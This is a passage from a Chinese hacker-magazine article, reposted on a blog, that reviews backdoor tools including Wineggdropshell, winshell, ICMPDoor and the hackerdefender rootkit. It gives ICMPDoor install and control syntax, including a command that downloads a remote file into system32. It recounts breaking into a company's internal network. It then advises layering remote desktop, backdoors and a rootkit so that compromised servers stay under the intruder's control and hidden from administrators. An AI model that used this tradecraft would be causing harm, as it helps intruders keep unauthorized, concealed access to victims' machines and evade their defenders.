target=_blank>程序</a>，比如sniffer等。http://ip/文件名保存文件名：下载<a href="http://www.nohack.cn/code/" target=_blank>程序</a>，直接从网上down一个后门到服务器上。<br>Installterm端口：在没有安装终端服务的win2k服务版的系统中安装终端服务，重启系统后才生效，并可以自定义连接端口，比如不用3389而用其他端口。<br>StopService/StartService:停止或者启动某个系统服务，比如telnet。<br>CleanEvent:删除系统日志。<br>Redirect:TCP数据转发，这个功能是后门<a href="http://www.nohack.cn/code/" target=_blank>程序</a>中非常出色的一个功能，可以通过某一端口的数据转发来控制内网的机器，在渗透入侵的时候非常管用！<br>EnumService:列举所有自动启动的服务的资料，比如后门、<a href="http://www.nohack.cn/" target=_blank>木马</a>。<br>RegEdit:进入注册表操作模式，熟悉注册表的使用者终于在后门中找到了福音！<br>Findpassword:得到所有登录用户密码，比我们常用的findpass功能可强多了。<br>&#8230;&#8230;<br>总体来讲，Wineggdropshell是后门<a href="http://www.nohack.cn/code/" target=_blank>程序</a>中很出彩的一个，它经过作者几次大规模的修改和升级，已经趋于稳定，功能的强大当然没得说，但是由于功能太强大，被查杀和怀疑是难以避免的，所以很多人在使用Wineggdropshell一段时间后就发现肉鸡飞了，其实是很正常的事，我你出不用气馁，其实用很简单的方法就可以很好地提高它的隐蔽性，下文将有说明。<br>相对于Wineggdropshell来说，独孤剑客的winshell在功能上就不那么全面了，但是笔者推荐新手更多的使用 winshell而不是Wineggdropshell，因为winshell功能除了获得一个shell以外，只加入了一些重启、关闭服务器的命令，功能相对简单，但完全使用系统自带的cmd来执行命令，对系统学习和掌握也是非常有帮助的！<br>Winshell和wolf这两者都是国内早期顶尖的后门<a href="http://www.nohack.cn/code/" target=_blank>程序</a>，<a href="http://www.nohack.cn/code/" target=_blank>程序</a>的编制无疑是非常经典的，新手学习时使用这两款后门一定能让你明白很多系统相关东西，了解很多入侵思路和方法。<br><br>C/S后门<br>传统的<a href="http://www.nohack.cn/" target=_blank>木马</a><a href="http://www.nohack.cn/code/" target=_blank>程序</a>常常使用C/S构架，这样的构架很方便控制，也在一定程度上避免了&#8220;万能密码&#8221;的情况出现，对后门私有化有一定的贡献，这方面分类比较模糊，很多后门可以归结到此类中，比如较巧妙的就是ICMPDoor了<br>ICMPDoor<br>类型：系统后门<br>使用范围：win2000/xp/2003<br>隐蔽程度：★★★★★<br>使用难度：★★★☆☆<br>危害程度：★★★★☆<br>查杀难度：★★★★★<br>这个后门利用ICMP通道进行通信，所以不开任何端口，只是利用系统本身的ICMP包进行控制安装成系统服务后，开机自动运行，可以穿透很多防火墙——很明显可以看出它的最大特点：不开任何端口~只通过ICMP控制！和上面任何一款后门<a href="http://www.nohack.cn/code/" target=_blank>程序</a>相比，它的控制方式是很特殊的，连80端口都不用开放，不得不佩服务<a href="http://www.nohack.cn/code/" target=_blank>程序</a>编制都在这方面独特的思维角度和眼光！<br>运用举例<br>这个后门其实用途最广的地方在于突破网关后对内网计算机的控制，因为很多机密数据都是放在内网计算机上的，而控制内网计算机并不是我们想到位的商业<a href="http://www.nohack.cn/" target=_blank>网络</a>进行入侵检测，它的<a href="http://www.nohack.cn/" target=_blank>网络</a>内部并不像我们常见的内网那样非常容易入侵和控制，因为该公司本身涉及到一些<a href="http://www.nohack.cn/" target=_blank>网络</a><a href="http://www.nohack.cn/" target=_blank>安全</a>的服务，所以内网个人计算机的防护是很到位的，在尝试过很多后门后，最后ICMPDoor帮我实现了成功的渗透内网！由此笔者开始爱上这个后门。<br>首先使用icmpsrv.exe-install参数进行后门的安装，再使用icmpsend.exeIP进行控制，可以用：[http: //xxx.xxx.xxx/admin.exep;-hkfx.exe]方式下载文件，保存在//system32/目录下，文件名为 hkfx.exe，<a href="http://www.nohack.cn/code/" target=_blank>程序</a>名前的&#8220;-&#8221;不能省去，使用[pslist]还可以列出远程主机的进程名称和pid，再使用[pskillid]就可以杀进程了，同样，输入普通cmd命令，则远程主机也就执行了相关的命令。<br>这个后门是采用的c/s构架，必须要使用icmpsend才能激活服务器，但是他也有自己的先天不足：后门依靠ICMP进行通讯，现在的<a href="http://www.nohack.cn/" target=_blank>网络</a>，经过冲击波的洗礼后，很少有服务器还接受ICMP包了，很多都屏蔽掉了它，所以用它来控制服务器不是一个好办法，这也是我为什么用它来控制内网计算机的原因了——内网很少有人屏蔽ICMP包吧？！<br>5.rootkit<br>如果说上面的后门<a href="http://www.nohack.cn/code/" target=_blank>程序</a>都各有千秋、各有所长的话，它们和经典的rootkit一比简直就是小巫见大巫了，那究竟什么样是rootkit呢？<br>rootkit出现于20世纪90年代初，在1994年2月的一篇<a href="http://www.nohack.cn/" target=_blank>安全</a>咨询报告中首先使用了rootkit这个名词。从出现至今，rootkit的<a href="http://www.nohack.cn/" target=_blank>技术</a>发展非常迅速，应用越来越广泛，检测难度也越来越大。其中钍对SunOS和Linux两种操作系统的rootkit最多。<br>很多人有一个误解，他们认为rootkit是用作获得系统root访问权限的工具。实际上，rootkit是<a href="http://www.nohack.cn/" target=_blank>攻击</a>都用来隐蔽自己的踪迹和保留root访问权限的工具。通常，<a href="http://www.nohack.cn/" target=_blank>攻击</a>者通过远程<a href="http://www.nohack.cn/" target=_blank>攻击</a>获得root访问权限，进入系统后，<a href="http://www.nohack.cn/" target=_blank>攻击</a>者会在侵入的主机中安装rootkit，然后他将经常通过rootkit的后门检查系统是否有其他的用户登录，如果只有自己，<a href="http://www.nohack.cn/" target=_blank>攻击</a>者就开始着手清理日志中的有关信息。通过rootkit的嗅探器获得其他系统的用户和密码之后，<a href="http://www.nohack.cn/" target=_blank>攻击</a>者就会利用这些信息侵入其他系统。<br>从*nix系统上迁移到<u><font color=#0000ff>windows</font></u>系统下的rootkit完全沿袭了这些&#8220;可怕&#8221;的功能！现在<a href="http://www.nohack.cn/" target=_blank>网络</a>上常见的rootkit是内核级后门软件，用户可以通过它隐藏文件、进程、系统服、系统驱动、注册表键和键值、打开的端口以及虚构可用磁盘窨。<a href="http://www.nohack.cn/code/" target=_blank>程序</a>同时也在内存中伪装它所做的改动，并且隐身地控制被隐藏进程。<a href="http://www.nohack.cn/code/" target=_blank>程序</a>安装隐藏后门，注册隐藏系统服务并且安装系统驱动。该后门<a href="http://www.nohack.cn/" target=_blank>技术</a>允许植入redirector，是非常难以查杀的一个东东，让很多<a href="http://www.nohack.cn/" target=_blank>网络</a>管员非常头疼！<br>hackerdefender<br>类型：系统后门<br>使用范围：win200/xp/2003<br>隐蔽程度：★★★★★<br>使用难度：★★★★★<br>危害程度：★★★★★<br>查杀难度：★★★★★（呵呵，全部五星，因为它太&#8220;霸道&#8221;了）<br>现在最新版本的hxdf是1.0.0，它是从国外传过来的一个<a href="http://www.nohack.cn/code/" target=_blank>程序</a>，包含两个关键<a href="http://www.nohack.cn/code/" target=_blank>程序</a>，里面的配置文件ini非常复杂，相信新手使用也是很困难的主要包括：[HiddenTable]，[RootProcesses]， [HiddenServices]，[HiddenRegKeys]，[HiddenRegvalues]，[StartupRun]， [FreeSpace],[HiddenpORTS]，[Settings]。对功能就是隐藏文件（目录）、隐藏进程、隐蔽服务、隐藏注册键、隐藏注册表键值、启动<a href="http://www.nohack.cn/code/" target=_blank>程序</a>、增加磁盘剩余空间、隐藏端口、后门设置，具体配置我们就不具体讲解了，本期文章有详细的介绍，我们说说它的特点（纯粹个人观点和经验偏激的地方请大家海涵）：<br>（1）可以实现正常系统TCP端口的通讯，比如80等，这个功能在高级后门并不鲜见。<br>（2）能得到简单的系统SHELL，对入侵的老手来说这就够了，多余的功能反而是累赘。<br>（3）隐藏端口，如果你非要使用TCP的某一个非常规端口通讯，那使用这个功能吧，放心，别人发现不了。<br>（4）隐藏后门的所有可找到东西！这个只能用一个字来形容：牛！比如隐藏文件、服务、注册表键等功能，虽然我们说起来是一句话，想念识货的朋友应该能发现这中间NB的地方！<br>（5）史上最经典后门思维：配合其他扩展型后门使用，效果好得出乎你的意料！（这是后面的内容，我们马上讲到）。<br>抛开其他不讲，系统中安装了这样的rootkit，你通过普通的查杀途径根本检测不到这个<a href="http://www.nohack.cn/code/" target=_blank>程序</a>这点就非常值得我们利用了！试想：一个在你服务器上运行的后门，你连看都看不到它，别说查杀了！<br>注：由于此后门危害太大，所以编辑特别在此掐掉作者一段篇幅，喜欢研究后门<a href="http://www.nohack.cn/code/" target=_blank>程序</a>的朋友可以自己去研究，不过千万注意不要误运行了<a href="http://www.nohack.cn/code/" target=_blank>程序</a>，查杀和清除是非常麻烦的事！直接重新安装系统吧！<br>经典后门思维<br>现在很多朋友都在尝试着开发一些自己的后门<a href="http://www.nohack.cn/code/" target=_blank>程序</a>，他们企图将非常多的功能加入到后门里恨不得一个后门就是一个操作系统！————很明显，这样是不对的！因为一个好的后门能实现非常单一的功能就够了，它不是给你控制服务器的，而是给你在丢掉服务器控制方法的时候用来再次控制服务器的！所以，不要经常使用后门<a href="http://www.nohack.cn/code/" target=_blank>程序</a>，当然也不要让你的后门<a href="http://www.nohack.cn/code/" target=_blank>程序</a>太在。<br>所有<a href="http://www.nohack.cn/" target=_blank>网络</a><a href="http://www.nohack.cn/" target=_blank>安全</a>工具都存在一个问题：隐藏！现在随着广大网友<a href="http://www.nohack.cn/" target=_blank>安全</a>意识的提高，杀毒软件、系统<a href="http://www.nohack.cn/" target=_blank>安全</a>保护<a href="http://www.nohack.cn/code/" target=_blank>程序</a>这些东西再不是&#8220;珍品&#8221;了，所以，就算你的后门<a href="http://www.nohack.cn/code/" target=_blank>程序</a>能实现两万个功能，但是很容易就被杀毒软件查杀的话，那也是白搭！换句话说：如果别人能很方便地看看进程、查查注册表、看看端口就能查出系统有问题的话，你这个后门也就算不上好了！所以记住：隐藏才是最重要的！<br>很多朋友都喜欢使用某个功能很强大的后门<a href="http://www.nohack.cn/code/" target=_blank>程序</a>来控制服务器，虽然很隐蔽，但一旦被杀，那他就只有望着服务哭了，其实只要我们稍微入宽思路就能解决这样问题：嵌套使用互补的后门<a href="http://www.nohack.cn/code/" target=_blank>程序</a>！这样一旦一个后门暴露，另一个后门或者几个后门依然在服务器——这点说起来很简单，里面涉及到很多入侵中的经验和方法，也涉入到rootkit，后文我们会讲到。<br>对现在的<a href="http://www.nohack.cn/" target=_blank>网络</a>来说，如果一个<a href="http://www.nohack.cn/" target=_blank>网络</a><a href="http://www.nohack.cn/" target=_blank>安全</a>工具被公布，那么，在很短的时间内这个<a href="http://www.nohack.cn/code/" target=_blank>程序</a>将被<a href="http://www.nohack.cn/" target=_blank>安全</a>爱好者传到<a href="http://www.nohack.cn/" target=_blank>网络</a>的任何一个地主！很明显，这样<a href="http://www.nohack.cn/code/" target=_blank>程序</a>的存活期很短，不出几天就被查杀了，所以本文列举的所有<a href="http://www.nohack.cn/code/" target=_blank>程序</a>都可以在<a href="http://www.nohack.cn/" target=_blank>网络</a>上找到（光盘上也有收录），只是给大家提供一种比较好的思路和介绍，很多的后门是私人使用的。希望大家通过自己的学习也能写出自己的优秀后门！<br>通过上面的讲解，相信大家对现在主流的后门<a href="http://www.nohack.cn/code/" target=_blank>程序</a>都有了一事实上程度的了解，由于篇幅关系，本文不可以一个接一个实际的去讲解用法和查杀，相信那样读者也读着无聊，编辑审稿后也不能刊登了，具体的使用方法还得靠各位去摸索，下面我们说说经典后门的几个个人体会。<br>首先拍拍wtf的马屁：这小子上次在黑防攻防实验室上说的那句话：&#8220;兄弟们千万不要拘泥于思维的定式，要知道<a href="http://www.nohack.cn/" target=_blank>安全</a>最重要的就是思维的锻炼和意识的培养，为了锻炼大家的思维能力，友情提醒一下大家，我们在关卡中有很多的陷阱哦！千万不要被表面的现象迷惑了！&#8221;不要小看了这句话，把这句话放到<a href="http://www.nohack.cn/" target=_blank>网络</a>入分和<a href="http://www.nohack.cn/" target=_blank>攻击</a>中，很多思维被发散出来，那是整体层次的提高！就拿我们的后门这方面来讲，同样是上面几个功能强大的、隐蔽性好的后门，为什么你装在肉鸡上，不出三天就被查杀了？而别人装一就一直用得好好的呢？这其中其实就是思维转换的重要性的体现，下面我们将具体说说后门<a href="http://www.nohack.cn/code/" target=_blank>程序</a>如何才能做的好的思维转换和特点利用，先来看看普通网友的误区：<br>（1）普通<a href="http://www.nohack.cn/" target=_blank>安全</a>爱好者都能通过常见的系统<a href="http://www.nohack.cn/bugs/" target=_blank>漏洞</a>或者其他途径入侵服务器，然后上去就是新建一个账户，直接添加到管理员权限，有点意识的还能在账户后面加一个$让别人在CMD无法发现，然后再通过什么3389、23控制服务器，汗！这就是你看《<a href="http://www.nohack.cn/" target=_blank>黑客</a>防线》的成绩？《<a href="http://www.nohack.cn/" target=_blank>黑客</a>防线》就这样教你？难道所有管理员都是白痴？都不知道检查系统最重要的账户？这样的肉鸡1天之内不丢都是个奇迹！<br>（2）控制服务器-&gt;上传后门_&gt;开放特定端口-&gt;利用后门控制服务器，这中间通过findpass之类的经典工具得到管理员的密码，给服务器开放3389等服务&#8230;&#8230;同样送给这样的朋友一个字：晕！一个简单得不能再简单的netstat-an就能让你的连接暴露无疑！那时候等着上法庭吧！<br>（3）克隆系统内置账户并使用它来登录服务器，这同样是一个不可取的方法，根据我的经验，这样的肉鸡肯定用不长！一两面三刀周就飞掉了！<br>&#8230;&#8230;&#8230;&#8230;<br>上面只是一些比较低端的错误，相信大家在看了此文后不会现再犯这样的错误，下面我们说说觉的比较<a href="http://www.nohack.cn/" target=_blank>安全</a>的入侵后控制肉鸡的办法，如果我今天讲的东西能有两、三句能让你在以后的入侵和<a href="http://www.nohack.cn/" target=_blank>安全</a>防护中记住，那我倍感欣慰了！<br>普通的入侵过程中，3389当然是大家最喜欢的控制方式，那为什么就只用3389来单纯控制服务吕呢？当别人关掉3389后你怎么控制呢？所以需要后门，那安装上普通的经典后门，为什么我的肉鸡还是在很短的时间内飞掉呢？——请注意：任何一个系统管理员都不是白痴！不管你多&#8220;黑&#8221;，你远程控制服务器总没有别人物理接触来得方便吧！逼不得已人家拔掉网线、格式化硬盘总能让你不能控制了吧？！所以，后门的隐蔽性是非常重要的，要让管理员无法发现系统中有后门就是非常重要的了！<br>一个好的后门，能实现单一的功能就行了，一定不要经常使用你的后门<a href="http://www.nohack.cn/code/" target=_blank>程序</a>来控制肉鸡，这样你想肉鸡不飞都困难，比较好的方法是：<br>3389/23+扩展型后门+rootkit<br>这是到目前为止最经典的一种后门搭配方式，它几方面的优点显示而易见：对方发现不明ip连接的时候肯定会检查系统问题，改system密码，清理账户是不可避免了，进而管理员对系统的<a href="http://www.nohack.cn/bugs/" target=_blank>漏洞</a>进行一次常规升级和检测，补上最开始被入我们入侵的<a href="http://www.nohack.cn/bugs/" target=_blank>漏洞</a>，这样如果没有后门，再进来就很难了。<br>通常这样情况下管理员会考虑系统中是不是存在后门，使用常见的杀毒软件，<a href="http://www.nohack.cn/" target=_blank>安全</a><a href="http://www.nohack.cn/code/" target=_blank>程序</a>来检测系统，发现后门立即查杀，所以在这里后门的隐蔽性非常重要，一时被杀，gameover！所以这里定要选择一些比较难查杀或者是加过壳的后门，上面介绍的后门就是不错的选择，线程插入式是比较难被杀掉的。<br>在这样基础上，如果他发现系统中某个<a href="http://www.nohack.cn/code/" target=_blank>程序</a>总是在对<a href="http://www.nohack.cn/" target=_blank>网络</a>连接，或者是某个端口总是有人连接在上面，管理员肯定会想办法kill掉这个<a href="http://www.nohack.cn/code/" target=_blank>程序</a>，所以普通后门再隐藏得好也是会被查杀的，这也是大多数朋友的疑惑了，在这里就需要使用rootkit了！<br>如果从系统级隐藏掉服务名、进、端口、注册表值、启动项目、<a href="http://www.nohack.cn/code/" target=_blank>程序</a>名，那现在想信普通的杀毒<a href="http://www.nohack.cn/code/" target=_blank>程序</a>、<a href="http://www.nohack.cn/" target=_blank>安全</a>工具要查出系统中的后门<a href="http://www.nohack.cn/code/" target=_blank>程序</a>是很难的！而这点，才是后门<a href="http://www.nohack.cn/code/" target=_blank>程序</a>的精华所在：隐藏！这样的功能，绝对不是某个后门<a href="http://www.nohack.cn/code/" target=_blank>程序</a>单一使用能实现！而rootkit和上面介绍的一系列后门中的精品就是你最好的选择！多尝试，想念你一定找到这个经典搭配中的优势的！退一万步讲，如果这样控制的肉鸡飞掉了，奉劝大家还是少玩为妙，免得惹火上身哦！</font></font> 
<img src ="http://www.cnitblog.com/yiye/aggbug/27319.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.cnitblog.com/yiye/" target="_blank">yiye</a> 2007-05-20 14:07 <a href="http://www.cnitblog.com/yiye/archive/2007/05/20/27319.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item></channel></rss>